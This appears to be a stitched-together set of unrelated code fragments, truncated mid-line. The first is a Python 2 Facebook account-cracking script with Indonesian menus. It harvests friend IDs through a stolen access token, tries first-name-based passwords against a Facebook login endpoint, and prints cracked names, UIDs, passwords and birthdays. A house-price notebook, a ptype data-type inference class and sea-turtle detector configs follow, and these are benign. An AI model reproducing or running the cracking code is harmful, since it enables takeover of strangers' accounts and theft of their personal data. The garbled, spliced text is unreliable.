print '\x1b[1;96m[!] \x1b[1;91mToken Invalid'
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
os.system('clear')
print logo
print '\x1b[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print '\x1b[1;97m[\x1b[1;93m01\x1b[1;97m]\x1b[1;96m->\x1b[1;97m Crack dari Daftar Teman'
print '\x1b[1;97m[\x1b[1;93m02\x1b[1;97m]\x1b[1;96m->\x1b[1;97m Crack dari ID Publik / Teman'
print '\x1b[1;97m[\x1b[1;93m03\x1b[1;97m]\x1b[1;96m->\x1b[1;97m Crack dari File'
print '\x1b[1;97m[\x1b[1;91m00\x1b[1;97m]\x1b[1;96m->\x1b[1;97m Kembali'
print '\x1b[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
pilih_indo()
def pilih_indo():
teak = raw_input('\x1b[1;93m-> \x1b[91m:\x1b[1;92m ')
if teak == '':
print '\x1b[1;97m[\x1b[1;91m!\x1b[1;97m]\x1b[1;97m Isi Yg Benar !'
pilih_indo()
elif teak == '1' or teak == '01':
os.system('clear')
print logo
print '\x1b[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif teak == '2' or teak == '02':
os.system('clear')
print logo
print '\x1b[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print ' \x1b[1;93m \xf0\x9f\xa4\xa1 \x1b[1;97mCRACK INDONESIA \x1b[1;93m\xf0\x9f\xa4\xa1'
print '\x1b[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
idt = raw_input('\x1b[1;97m{\x1b[1;93m+\x1b[1;97m} ID Publik / Teman : ')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;97m{\x1b[1;93m\xe2\x9c\x93\x1b[1;97m} Nama : ' + op['name']
except KeyError:
print '\x1b[1;97m[\x1b[1;93m!\x1b[1;97m] ID Publik / Teman Tidak Ada !'
raw_input('\n[ Kembali ]')
indo()
except requests.exceptions.ConnectionError:
print '[!] Tidak ada koneksi !'
keluar()
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif teak == '3' or teak == '03':
os.system('clear')
print logo
try:
print '\x1b[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
idlist = raw_input('\x1b[1;97m{\x1b[1;93m?\x1b[1;97m} Nama File : ')
for line in open(idlist, 'r').readlines():
id.append(line.strip())
except KeyError:
print '\x1b[1;97m[!] File tidak ada ! '
raw_input('\n\x1b[1;92m[ \x1b[1;97mKembali \x1b[1;92m]')
except IOError:
print '\x1b[1;97m[!] File tidak ada !'
raw_input('\n\x1b[1;92m[ \x1b[1;97mKembali \x1b[1;92m]')
indo()
elif teak == '0' or teak == '00':
menu()
else:
print '\x1b[1;97m[\x1b[1;91m!\x1b[1;97m]\x1b[1;97m Isi Yg Benar !'
pilih_indo()
print '\x1b[1;97m{\x1b[1;93m+\x1b[1;97m} Total ID : ' + str(len(id))
print '\x1b[1;97m{\x1b[1;93m?\x1b[1;97m} Stop CTRL+Z'
titik = [
'. ',
'.. ',
'... ']
for o in titik:
print '\r\x1b[1;97m{\x1b[1;93m\xe2\x80\xa2\x1b[1;97m} Crack Berjalan ' + o,
sys.stdout.flush()
time.sleep(1)
print '\n\x1b[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
def main(arg):
user = arg
try:
os.mkdir('out')
except OSError:
pass
try:
a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket)
c = json.loads(a.text)
pass1 = c['first_name'] + '<PASSWORD>'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
w = json.load(data)
if 'access_token' in w:
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
print '\x1b[1;92m(!) [Berhasil]'
print '\x1b[1;93m(+) Nama : \x1b[1;97m ' + c['name']
print '\x1b[1;93m(+) UID : \x1b[1;97m ' + user
print '\x1b[1;93m(+) Katasandi : \x1b[1;97m ' + pass1
print '\x1b[1;93m(+) DD/MM/YY : \x1b[1;97m ' + c['birthday']
print '\x1b[1;93m(+) Followers : \x1b[1;97m ' + | |
# -*- coding: utf-8 -*-
# ---
# jupyter:
# jupytext:
# formats: ipynb,py:light
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.7.1
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # House Price Prediction
# ## 1. Environment Setup
# +
# To get multiple outputs in the same cell
from IPython.core.interactiveshell import InteractiveShell
InteractiveShell.ast_node_interactivity = "all"
# +
# Supress Warnings
import warnings
warnings.filterwarnings('ignore')
# +
import numpy as np
from scipy import stats
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
# %matplotlib inline
# +
# Set the required global options
# To display all the columns in dataframe
pd.set_option( "display.max_columns", None)
pd.set_option( "display.max_rows", None)
# -
# ## 2. Reading the Input data (csv) file
house = pd.read_csv('./train.csv')
house.head()
# ## 3. Data Analysis & Cleaning
# Checking rows and columns - shape
house.shape
# Getting the overview of Data types and Non-Null info
house.info()
# ### Handling Missing Values
# +
# Checking for any Null columns
house.isnull().sum().any()
house.shape[0]
# Finding the columns with more than 40% NULLs.
ser = house.isnull().sum()/len(house)*100
null_drps = ser[ser > 40]
null_drps
# +
# Dropping variables with more than 95% NULLs.
# Here, out of these 5, four of them has more than 80% NULLs.
house.drop(null_drps.index, axis='columns', inplace=True)
# Verifying, whether variables are successfully dropped
ser = house.isnull().sum()/len(house)*100
nulls = ser[ser > 0]
nulls
# -
# Checking the info of the remaining columns with NULLs
house[nulls.index].info()
# #### Imputation of Numerical variables
# Imputing Numerical variables
num_var = ['LotFrontage','MasVnrArea','GarageYrBlt']
house[num_var].describe()
# Plotting boxplot to understand outliers
plt.figure(figsize=(15,7))
for i,j in enumerate(num_var):
plt.subplot(1,3,i+1)
sns.boxplot(data=house, x=j)
plt.show();
# +
# There are outliers in LotFrontage and MasVnrArea.
# I would impute these with median as mean is eaffected by outliers
house['LotFrontage'] = house['LotFrontage'].fillna(house['LotFrontage'].median())
house['MasVnrArea'] = house['MasVnrArea'].fillna(house['MasVnrArea'].median())
# There are no outliers in GarageYrBlt. So, I would impute this with mean
house['GarageYrBlt'] = house['GarageYrBlt'].fillna(house['GarageYrBlt'].mean())
# -
# #### Imputation of Categorical variables
# Checking the count of each category
house['MasVnrType'].value_counts()
# Replacing it with it's mode i.e. None
house['MasVnrType'] = house['MasVnrType'].replace(np.nan, house["MasVnrType"].mode()[0])
# Checking the count of each category
house['BsmtQual'].value_counts()
# Replacing NaN values to NA which indicates that the property doesnt have a basement.
house['BsmtQual'].fillna(house["MasVnrType"].mode()[0], inplace=True)
# Checking the count of each category
house['BsmtCond'].value_counts()
# Replacing NaN values to NA which indicates that the property doesnt have a basement.
# house['BsmtCond'] = house['BsmtCond'].replace(np.nan, 'NA')
house['BsmtCond'].fillna(house["BsmtCond"].mode()[0], inplace=True)
# Checking the count of each category
house['BsmtExposure'].value_counts()
# Replacing NaN values to NA which indicates that the property doesnt have a basement.
# house['BsmtExposure'] = house['BsmtExposure'].replace(np.nan, 'NA')
house['BsmtExposure'].fillna(house["BsmtExposure"].mode()[0], inplace=True)
# Checking the count of each category
house['BsmtFinType1'].value_counts()
# Replacing NaN values to NA which indicates that the property doesnt have a basement.
# house['BsmtFinType1'] = house['BsmtFinType1'].replace(np.nan, 'NA')
house['BsmtFinType1'].fillna(house["BsmtFinType1"].mode()[0], inplace=True)
# Checking the count of each category
house['BsmtFinType2'].value_counts()
# Replacing NaN values to NA which indicates that the property doesnt have a basement.
# house['BsmtFinType2'] = house['BsmtFinType2'].replace(np.nan, 'NA')
house['BsmtFinType2'].fillna(house["BsmtFinType2"].mode()[0], inplace=True)
# Checking the count of each category
house['Electrical'].value_counts()
# Replacing it with it's mode i.e. SBrkr
# house['Electrical'] = house['Electrical'].replace(np.nan, 'NA')
house['Electrical'].fillna(house["Electrical"].mode()[0], inplace=True)
# Checking the count of each category
house['GarageType'].value_counts()
# Replacing NaN values to NA which indicates that the property doesnt have a Garage.
# house['GarageType'] = house['GarageType'].replace(np.nan, 'NA')
house['GarageType'].fillna(house["GarageType"].mode()[0], inplace=True)
# Checking the count of each category
house['GarageFinish'].value_counts()
# Replacing NaN values to NA which indicates that the property doesnt have a Garage.
# house['GarageFinish'] = house['GarageFinish'].replace(np.nan, 'NA')
house['GarageFinish'].fillna(house["GarageFinish"].mode()[0], inplace=True)
# Checking the count of each category
house['GarageQual'].value_counts()
# Replacing NaN values to NA which indicates that the property doesnt have a Garage.
# house['GarageQual'] = house['GarageQual'].replace(np.nan, 'NA')
house['GarageQual'].fillna(house["GarageQual"].mode()[0], inplace=True)
# Checking the count of each category
house['GarageCond'].value_counts()
# Replacing NaN values to NA which indicates that the property doesnt have a Garage.
# house['GarageCond'] = house['GarageCond'].replace(np.nan, 'NA')
house['GarageCond'].fillna(house["GarageCond"].mode()[0], inplace=True)
# Checking for any Null columns
house.isnull().sum().any()
# Dropping variable 'Id' as it has a monotonic increasing value, which would not add any value
house.drop(columns='Id', inplace=True)
# ### Deriving features from date
# +
# import datetime as dt
# present_yr = int(dt.datetime.now().year())
# -
# Deriving Original Age of the house at Point of Sale
house['HouseOrigAgeAtPOS'] = house['YrSold'] - house['YearBuilt']
house['HouseReModAgeAtPOS'] = house['YrSold'] - house['YearRemodAdd']
house['GarageAgeAtPOS'] = house['YrSold'] - house['GarageYrBlt']
# Deriving a feature to store 1, if house is remodelled, otherwise 0
house['IsReMod'] = np.where(house['YearBuilt'] == house['YearRemodAdd'], 0,1)
house[['YearBuilt','YearRemodAdd','YrSold','HouseOrigAgeAtPOS','HouseReModAgeAtPOS','IsReMod','GarageAgeAtPOS','SalePrice']].head()
# Now, since the features are derived from the date variables, we can drop them.
house.drop(columns=['YearBuilt','YearRemodAdd','GarageYrBlt','YrSold'],inplace=True)
# +
# Dropping MoSold, SaleType and SaleCondition -
# These variables won't be available at the time of new Sale n hence cannot be considered for Price Prediction
# house.drop(columns=['MoSold','SaleType','SaleCondition'],inplace=True)
house.drop(columns=['MoSold'],inplace=True)
# +
# MSSubClass, OverallQual and OverallCond store num values but are categorical informations.
# Thus, converting them to categories.
to_cat_vars = ['MSSubClass','OverallQual','OverallCond']
for i in to_cat_vars:
house[i] = house[i].astype(object)
# Verifying the type conversion
house[to_cat_vars].info()
# -
# ### Data Exploration
# +
# house.describe()
# +
# house.sample(5)
# -
plt.figure(figsize=(18,13));
sns.heatmap(house.corr(), annot = False);
# - Early findings from the heatmap suggests that Sale Price of house is faily correlated with
# - HouseOrigAgeAtPOS
# - HouseReModAgeAtPOS
# - MasVnrArea
# - TotalBsmtSF
# - 1stFlrSF
# - GrLivArea
# - FullBath
# - Fireplaces
# - GarageYrBlt
# - GarageCars
# - GarageArea
#
# _All these are out of the Numerical Features._
# +
# Re-Inferring the results from the heatmap using the Correlation table
hc = house.corr()
SP = hc['SalePrice']
# checking for Important variables (iv) - with pearson value > abs(0.3)
iv = hc.loc[ (abs(hc['SalePrice']) > abs(0.3)) & (hc.index != 'SalePrice'),'SalePrice'].sort_values(ascending=False)
iv
# +
import math
l = len(iv.index)
b = 3
a = math.ceil(l/b)
c = 1
plt.figure(figsize=(18,22))
for i in iv.index:
plt.subplot(a,b,c);
sns.regplot(data=house, x= i, y= 'SalePrice');
c += 1
plt.show();
# -
# - **Inference**
# - _Most of the variables are continuous except few like GarageCars, TotRmsAbvGrd, FullBath, FirePlaces._
# - _The **continuous variables (Independent Variables)** in the above plots are **fairly Linearly related** with the **Target Variable, SalePrice**._
# - Hence, we can safely **perform LINEAR REGRESSION.**
# Less Important variables (liv) - Derived from the corr() table
liv = hc.loc[ (abs(hc['SalePrice']) <= abs(0.3)) & (hc.index != 'SalePrice'),'SalePrice'].sort_values(ascending=False)
liv
# +
l = len(liv.index)
b = 3
a = math.ceil(l/b)
c = 1
plt.figure(figsize=(18,22))
for i in liv.index:
plt.subplot(a,b,c)
sns.regplot(data=house, x= i, y= 'SalePrice')
c += 1
plt.show();
# -
# - **Inference**
# - _Most of the variables are **actually Categorical**._
# - _The **continuous variables (Independent Variables)** in the above plots have **poor Linear relation** with the **Target Variable, SalePrice**._
# - _Hence, we can safely **drop the continuous variables from the above plot.**_
# - _I would further analyze the actually categorical variables like **Number of Bathrooms, Bedrooms or Kitchen.**_
# +
# Dropping the poorly related continuous independent variables
house.drop(columns=['LotArea','BsmtUnfSF','ScreenPorch','PoolArea','3SsnPorch','BsmtFinSF2','MiscVal','LowQualFinSF','EnclosedPorch'], inplace=True)
# -
lst = ['HalfBath','BsmtFullBath','BedroomAbvGr','BsmtHalfBath','IsReMod','KitchenAbvGr']
for i in lst:
house[i].value_counts()
# - **Inference**
# - 'BsmtHalfBath','IsReMod','KitchenAbvGr' seems to be skewed.
# - To anlyze more, converting to category
house[lst] = house[lst].astype(object)
house[lst].info()
iv_lst = ['FullBath','TotRmsAbvGrd','Fireplaces','GarageCars']
house[iv_lst] = house[iv_lst].astype(object)
house[iv_lst].info()
# ### Analysing the categorical variables
# Selecting only the variables having categorical values
house_cat = house.select_dtypes(exclude='number')
house_cat.head()
# +
## Show labels in bar plots - copied from https://stackoverflow.com/a/48372659
def showLabels(ax, d=None):
plt.margins(0.2, 0.2)
rects = ax.patches
i = 0
locs, labels = plt.xticks()
counts = {}
if not d is None:
for key, value in d.items():
counts[str(key)] = value
# For each bar: Place a label
for rect in rects:
# Get X and Y placement of label from rect.
y_value = rect.get_height()
x_value = rect.get_x() + rect.get_width() / 2
# Number of points between bar and label. Change to your liking.
space = 5
# Vertical alignment for positive values
va = 'bottom'
# If value of bar is negative: Place label below bar
if y_value < 0:
# Invert space to place label below
space *= -1
# Vertically align label at top
va = 'top'
# Use Y value as label and format number with one decimal place
if d is None:
label = "{:.1f}".format(y_value)
else:
try:
label = "{:.1f}".format(y_value) + "\nof " + str(counts[str(labels[i].get_text())])
except:
label = "{:.1f}".format(y_value)
i = i+1
# Create annotation
plt.annotate(
label, # Use `label` as label
(x_value, y_value), # Place label at end of the bar
xytext=(0, space), # Vertically shift label by `space`
textcoords="offset points", # Interpret `xytext` as offset in points
ha='center', # Horizontally center label
va=va) # Vertically align label differently for
# positive and negative values.
# -
# This user-defined function plots the distribution of target column, and its boxplot against loan_status column
def plot_distribution(var):
plt.figure(figsize=(18,11))
plt.subplot(1, 3, 1)
ser = (house[var].value_counts(normalize=True)*100)
ax = ser.plot.bar(color=sns.color_palette("pastel", 10))
showLabels(ax);
plt.subplot(1, 3, 2)
ser = house[var].value_counts()
ax = ser.plot.bar(color=sns.color_palette("pastel", 10))
showLabels(ax);
#ax = sns.histplot(data=house, x=var, kde=False)
plt.subplot(1, 3, 3)
ax = sns.boxplot(x=var, y= 'SalePrice', data=house, order = ser.index, palette="pastel")
ax.set_xticklabels(ax.get_xticklabels(), rotation=60)
# ax.set_xticks(rotation=60)
plt.show()
for i in house_cat.columns:
plot_distribution(i)
# +
# From analysing the above plots, there are few skewed categorical variables. - So, Dropping them
skwd_cat_vars = ['Street','Utilities','Condition2','RoofMatl','BsmtCond','Heating','Functional']
house.drop(columns=skwd_cat_vars,inplace=True)
# +
# | |
<reponame>wrattler/wrattler
# Mainly text manipulation utils
from src.utils import create_folders
# Latex, and visualization utils
from src.utils import print_to_file, save_object
import csv
import numpy as np
import os
from src.Config import Config
from src.Model import PtypeModel
from src.PFSMRunner import PFSMRunner
from scipy.stats import norm
class Ptype:
avg_racket_time = None
def __init__(self, _exp_num=0, _types={1:'integer', 2:'string', 3:'float', 4:'boolean', 5:'gender', 6:'date-iso-8601', 7:'date-eu', 8:'date-non-std-subtype', 9:'date-non-std'}, _data_frames=None):
self.exp_num = _exp_num
self.types = _types
self.PFSMRunner = PFSMRunner(list(_types.values()))
self.model = None
self.data_frames = _data_frames
self.all_posteriors = {}
if _data_frames is not None:
self.set_data(_data_frame=_data_frames[0])
def set_data(self, _data_frame, _dataset_name=None, _column_names=None):
if _dataset_name is None:
_dataset_name = 'demo'
_data_frame = _data_frame.rename(columns=lambda n: str(n).replace(' ', ''))
_data_frame = _data_frame.applymap(str)
# to refresh the outputs
self.all_posteriors[_dataset_name] = {}
self.predicted_types = {}
self.normal_types = {}
self.missing_types = {}
self.anomaly_types = {}
self.p_z_columns = {}
self.p_t_columns = {}
# Check for dataframes without column names
if _column_names is None:
_column_names = _data_frame.columns
# Creates a configuration object for the experiments
if self.types is None:
config = Config(_dataset_name=_dataset_name, _column_names=_column_names)
else:
config = Config(_dataset_name=_dataset_name, _column_names=_column_names, _types=self.types)
# Ptype model for inference
if self.model is None:
self.model = PtypeModel(config, _data_frame=_data_frame)
else:
self.model.set_params(config, _data_frame=_data_frame)
# Creates a df to report annotations for Wrattler
self.missing_types = {}
self.anomaly_types = {}
self.p_z_columns = {}
self.p_t_columns = {}
self.print = False
self.prediction_path = None
self.predicted_types = {}
###################### MAIN METHODS #######################
def run_inference_on_model(self, probs, counts):
if self.print:
print_to_file('\tinference is running...')
self.model.run_inference(probs, counts)
def run_inference(self, _data_frame, _print=False, _prediction_path=None, _save=False):
""" Runs ptype for each column in a dataframe.
The outputs are stored in dictionaries (see store_outputs).
The column types are saved to a csv file.
:param _data_frame:
:param _print:
:param _prediction_path:
:param _save:
"""
self.set_data(_data_frame=_data_frame)
self.print = _print
self.prediction_path = _prediction_path
if self.print:
print_to_file('processing ' + self.model.experiment_config.dataset_name)
# Normalizing the parameters to make sure they're probabilities
self.normalize_params()
# Generates a binary mask matrix to check if a word is supported by a PFSM or not. (this is just to optimize the implementation.)
self.PFSMRunner.update_values(np.unique(self.model.data.values))
for i, column_name in enumerate(list(self.model.experiment_config.column_names)):
# self.setup_a_column(i, column_name)
# Calculates the probabilities
probabilities, counts = self.generate_probs_a_column(column_name)
# Runs inference for a column
self.run_inference_on_model(probabilities, counts)
# Stores types, both cols types and rows types
self.store_outputs(column_name)
# Export column types, and missing data
if _save:
self.write_type_predictions_2_csv(list(self.predicted_types.values()))
def train_all_models_multiple_dfs(self, runner):
if self.print:
print_to_file('\ttraining is running...')
return self.model.train_all_z_multiple_dfs_new(runner)
def train_machines_multiple_dfs(self, _labels, _experiment_output_name='demo',_max_iter=20, _prediction_path=None, _print=False, _test_data=None, _test_labels=None, _uniformly=False):
""" Train the PFSMs given a set of dataframes and their labels
:param _labels: column types labeled by hand, where _label[i][j] denotes the type of j^th column in i^th dataframe.
:param _experiment_output_name:
:param _max_iter: the maximum number of iterations the optimization algorithm runs as long as it's not converged.
:param _prediction_path:
:param _print:
:param _test_data:
:param _test_labels:
:param _uniformly: a binary variable used to initialize the PFSMs - True allows initializing uniformly rather than using hand-crafted values.
:return:
"""
self.print = _print
self.prediction_path = _prediction_path
self.experiment_output_name = _experiment_output_name
if _uniformly:
self.initialize_params_uniformly()
# Setup folders and probabilities for all columns
self.normalize_params()
# Changing column names
self.data_frames = [data_frame.rename(columns=lambda n: str(n).replace(' ', '')) for data_frame in self.data_frames]
self.model.data_frames = self.data_frames
# find the unique values in all of the columns once
for i, df in enumerate(self.model.data_frames):
if i == 0:
unique_vals = np.unique(df.values)
else:
unique_vals = np.concatenate((unique_vals, np.unique(df.values)))
self.model.unique_vals = unique_vals
self.PFSMRunner.set_unique_values(unique_vals)
# Finding unique values and their counts
self.model.dfs_unique_vals_counts = {}
for i, df in enumerate(self.data_frames):
df_unique_vals_counts = {}
for column_name in list(df.columns):
temp_x, counts = np.unique([str(int_element) for int_element in df[column_name].tolist()], return_counts=True)
counts = {u_data: c for u_data, c in zip(temp_x, counts)}
temp_counts = list(counts.values())
counts_array = np.reshape(temp_counts, newshape=(len(temp_counts),))
df_unique_vals_counts[column_name] = [temp_x, counts_array]
self.model.dfs_unique_vals_counts[str(i)] = df_unique_vals_counts
# Setting
self.model.labels = _labels
self.model.types = self.types
self.model.J = len(self.PFSMRunner.machines) # J: num of data types including missing and anomaly.
self.model.K = self.model.J - 2 # K: num of possible column data types (excluding missing and anomaly)
self.model.pi = [self.model.PI for j in range(self.model.K)] # mixture weights of row types
self.model.current_runner = self.PFSMRunner
training_error = []
training_error.append(self.calculate_error_df(self.data_frames, _labels))
save_object(self.PFSMRunner, self.experiment_output_name + '_training_runner_initial.pkl')
print(training_error)
# Iterates over whole data points
for it in range(_max_iter):
print_to_file('iteration = ' + str(it), filename=self.experiment_output_name + '_output.txt')
# Trains machines using all of the training data frames
self.PFSMRunner = self.train_all_models_multiple_dfs(self.PFSMRunner)
self.model.current_runner = self.PFSMRunner
# Calculate training and validation error at each iteration
training_error.append(self.calculate_error_df(self.data_frames, _labels))
print(training_error)
save_object(self.PFSMRunner, self.experiment_output_name + '_training_runner' + str(it) + '.pkl')
if it > 0:
if (training_error[-2] - training_error[-1] < 1e-4):
print_to_file('converged!', filename=self.experiment_output_name + '_output.txt')
break
save_object(training_error, self.experiment_output_name + '_training_error.pkl')
def train_machines_multiple_dfs_new(self, _labels, _experiment_output_name='demo',_max_iter=20, _prediction_path=None, _print=False, _test_data=None, _test_labels=None, _uniformly=False):
""" Train the PFSMs given a set of dataframes and their labels
:param _labels: column types labeled by hand, where _label[i][j] denotes the type of j^th column in i^th dataframe.
:param _experiment_output_name:
:param _max_iter: the maximum number of iterations the optimization algorithm runs as long as it's not converged.
:param _prediction_path:
:param _print:
:param _test_data:
:param _test_labels:
:param _uniformly: a binary variable used to initialize the PFSMs - True allows initializing uniformly rather than using hand-crafted values.
:return:
"""
self.print = _print
self.prediction_path = _prediction_path
self.experiment_output_name = _experiment_output_name
if _uniformly:
self.initialize_params_uniformly()
# Setup folders and probabilities for all columns
self.normalize_params()
# Changing column names
self.data_frames = [data_frame.rename(columns=lambda n: str(n).replace(' ', '')) for data_frame in self.data_frames]
self.model.data_frames = self.data_frames
# find the unique values in all of the columns once
for i, df in enumerate(self.model.data_frames):
if i == 0:
unique_vals = np.unique(df.values)
else:
unique_vals = np.concatenate((unique_vals, np.unique(df.values)))
self.model.unique_vals = unique_vals
self.PFSMRunner.set_unique_values(unique_vals)
# Finding unique values and their counts
self.model.dfs_unique_vals_counts = {}
for i, df in enumerate(self.data_frames):
df_unique_vals_counts = {}
for column_name in list(df.columns):
temp_x, counts = np.unique([str(int_element) for int_element in df[column_name].tolist()], return_counts=True)
counts = {u_data: c for u_data, c in zip(temp_x, counts)}
temp_counts = list(counts.values())
counts_array = np.reshape(temp_counts, newshape=(len(temp_counts),))
df_unique_vals_counts[column_name] = [temp_x, counts_array]
self.model.dfs_unique_vals_counts[str(i)] = df_unique_vals_counts
# Setting
self.model.labels = _labels
self.model.types = self.types
self.model.J = len(self.PFSMRunner.machines) # J: num of data types including missing and anomaly.
self.model.K = self.model.J - 2 # K: num of possible column data types (excluding missing and anomaly)
self.model.pi = [self.model.PI for j in range(self.model.K)] # mixture weights of row types
self.model.current_runner = self.PFSMRunner
training_error = []
training_error.append(self.calculate_error_df(self.data_frames, _labels))
save_object(self.PFSMRunner, self.experiment_output_name + '_training_runner_initial.pkl')
print(training_error)
# Iterates over whole data points
for it in range(_max_iter):
print_to_file('iteration = ' + str(it), filename=self.experiment_output_name + '_output.txt')
# Trains machines using all of the training data frames
self.PFSMRunner = self.train_all_models_multiple_dfs(self.PFSMRunner)
self.model.current_runner = self.PFSMRunner
# Calculate training and validation error at each iteration
training_error.append(self.calculate_error_df(self.data_frames, _labels))
print(training_error)
if it > 0:
if (training_error[-2] - training_error[-1] < 1e-2):
print_to_file('converged!', filename=self.experiment_output_name + '_output.txt')
save_object(self.PFSMRunner, self.experiment_output_name + '_training_runner' + str(it) + '.pkl')
break
save_object(self.PFSMRunner, self.experiment_output_name + '_training_runner' + str(it) + '.pkl')
save_object(training_error, self.experiment_output_name + '_training_error.pkl')
####################### OUTPUT METHODS #########################
def show_results_df(self,):
df_output = self.model.data.copy()
df_output.columns = df_output.columns.map(lambda x: x + '(' + self.predicted_types[str(x).replace(' ', '')] + ')')
return df_output
def show_results(self, cols=None):
if cols is None:
cols = self.predicted_types
for col in cols:
print('col: ' + col)
print('\tpredicted type: ' + self.predicted_types[col])
print('\tposterior probs: ', self.all_posteriors[self.model.experiment_config.dataset_name][col])
print('\ttypes: ', list(self.types.values()), '\n')
unique_vals, unique_vals_counts = np.unique([str(int_element) for int_element in self.model.data[col].tolist()], return_counts=True)
indices = self.normal_types[col]
if len(indices) == 0:
count_normal = 0
pass
else:
some_normal_data_values = [unique_vals[ind] for ind in indices][:20]
some_normal_data_values_counts = [unique_vals_counts[ind] for ind in indices][:20]
count_normal = sum(unique_vals_counts[indices])
if len(self.missing_types[col]) == 0:
count_missing = 0
pass
else:
indices = self.missing_types[col]
missing_values = [unique_vals[ind] for ind in indices][:20]
missing_values_counts = [unique_vals_counts[ind] for ind in indices][:20]
count_missing = sum(unique_vals_counts[indices])
if len(self.anomaly_types[col]) == 0:
count_anomalies = 0
pass
else:
indices = self.anomaly_types[col]
anomalies = [unique_vals[ind] for ind in indices]
anomalies_counts = [unique_vals_counts[ind] for ind in indices]
count_anomalies = sum(unique_vals_counts[indices])
if self.normal_types[col] != []:
print('\tsome normal data values: ', some_normal_data_values)
print('\ttheir counts: ', some_normal_data_values_counts)
print('\tfraction of normal:', round(count_normal / (count_normal + count_missing + count_anomalies), 2), '\n')
if self.missing_types[col] != []:
print('\tmissing values:', missing_values)
print('\ttheir counts: ', missing_values_counts)
print('\tfraction of missing:', round(count_missing / (count_normal + count_missing + count_anomalies), 2), '\n')
if self.anomaly_types[col] != []:
print('\tanomalies:', anomalies)
print('\ttheir | |
Head NMS 0%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'seaturtle', 'weight_filepath' : 'seaturtle', 'nms': True, 'nms_thresh': 0.00, 'species_set' : set(['turtle_hawksbill+head'])},
# {'label': 'Hawksbill Head NMS 10%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'seaturtle', 'weight_filepath' : 'seaturtle', 'nms': True, 'nms_thresh': 0.10, 'species_set' : set(['turtle_hawksbill+head'])},
# {'label': 'Hawksbill Head NMS 20%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'seaturtle', 'weight_filepath' : 'seaturtle', 'nms': True, 'nms_thresh': 0.20, 'species_set' : set(['turtle_hawksbill+head'])},
# {'label': 'Hawksbill Head NMS 30%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'seaturtle', 'weight_filepath' : 'seaturtle', 'nms': True, 'nms_thresh': 0.30, 'species_set' : set(['turtle_hawksbill+head'])},
# {'label': 'Hawksbill Head NMS 40%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'seaturtle', 'weight_filepath' : 'seaturtle', 'nms': True, 'nms_thresh': 0.40, 'species_set' : set(['turtle_hawksbill+head'])},
# {'label': 'Hawksbill Head NMS 50%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'seaturtle', 'weight_filepath' : 'seaturtle', 'nms': True, 'nms_thresh': 0.50, 'species_set' : set(['turtle_hawksbill+head'])},
# {'label': 'Hawksbill Head NMS 60%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'seaturtle', 'weight_filepath' : 'seaturtle', 'nms': True, 'nms_thresh': 0.60, 'species_set' : set(['turtle_hawksbill+head'])},
# {'label': 'Hawksbill Head NMS 70%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'seaturtle', 'weight_filepath' : 'seaturtle', 'nms': True, 'nms_thresh': 0.70, 'species_set' : set(['turtle_hawksbill+head'])},
# {'label': 'Hawksbill Head NMS 80%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'seaturtle', 'weight_filepath' : 'seaturtle', 'nms': True, 'nms_thresh': 0.80, 'species_set' : set(['turtle_hawksbill+head'])},
# {'label': 'Hawksbill Head NMS 90%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'seaturtle', 'weight_filepath' : 'seaturtle', 'nms': True, 'nms_thresh': 0.90, 'species_set' : set(['turtle_hawksbill+head'])},
# {'label': 'Hawksbill Head NMS 100%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'seaturtle', 'weight_filepath' : 'seaturtle', 'nms': True, 'nms_thresh': 1.00, 'species_set' : set(['turtle_hawksbill+head'])},
# ],
# {},
# ),
# 'hammerhead': (
# [
# {'label': 'Hammerhead NMS 0%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'hammerhead', 'weight_filepath' : 'hammerhead', 'nms': True, 'nms_thresh': 0.00, 'species_set' : set(['shark_hammerhead'])},
